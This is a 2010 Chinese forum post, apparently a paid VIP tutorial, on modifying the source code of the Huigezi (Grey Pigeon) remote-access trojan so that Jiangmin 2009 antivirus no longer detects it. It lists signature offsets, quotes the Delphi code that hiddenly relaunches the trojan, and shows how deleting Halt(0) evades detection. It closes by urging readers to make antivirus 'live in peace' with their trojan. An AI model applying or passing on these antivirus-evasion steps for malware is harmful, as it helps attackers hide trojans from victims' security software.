|
|
发表于 2010-2-28 11:39:33
|显示全部楼层
【教程题目】 第四讲:灰鸽子1.2源代码简单修改过江民2009杀毒软件
【教程目的】 用最简单和最快速的办法过掉杀毒软件!
【教程口号】 坚信任何杀软都有弱点,只要你有一个不断探索发现的心!
附:【教程加餐】 探索发现:一招搞定江民2009 !
【教程工具】 delphi 7.0,灰鸽子V1.2源代码
【编译环境】 windowsXP SP3
【教程计划】
============================================================
(1) 定位特征码
[特征] 000BC63A_00000002
[特征] 000BD89E_00000002
江民2009
如何找到被杀源码呢,大家注意特征码中的字符,找出源码相似的!
大家发现有NetSata,好的,利用delphi的search功能找到——请看(2)
(2) 对应源码中的修改
if StrTmpList[1]='075' then
begin {重新加载}
try
Timer1.Enabled :=False;
IdTCPOnline.Disconnect;
Winexec(pchar(paramstr(0)+' -NetSata'),SW_Hide);
Halt(0);
except
end;
Exit;
end;
这一处如何修改呢,怎样用最简单的办法过掉江民呢?
方法(1)这处功能可以不要,删掉!
方法(2)可以将Halt(0)修改为exit 或者删掉
修改如下
if StrTmpList[1]='075' then
begin {重新加载}
try
Timer1.Enabled :=False;
IdTCPOnline.Disconnect;
Winexec(pchar(paramstr(0)+' -NetSata'),SW_Hide);
except
end;
Exit;
end;
简单吧?看看能不能过掉江民2009, OK! 过掉了。
============================================================
VIP会员们,你们掌握了么?要发散你们的思维,想想还有什么修改办法,
免杀是试出来的,也许你会发现和拥有自己的方法额!嘿嘿 思考吧!!!!!
好了,教程结束!
【课后作业】
思考加实践!让杀毒软件和你的木马和平相处吧!!!
甲壳虫免杀VIP教程 vip.jksing.com |
|
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
发表于 2010-7-23 14:37:55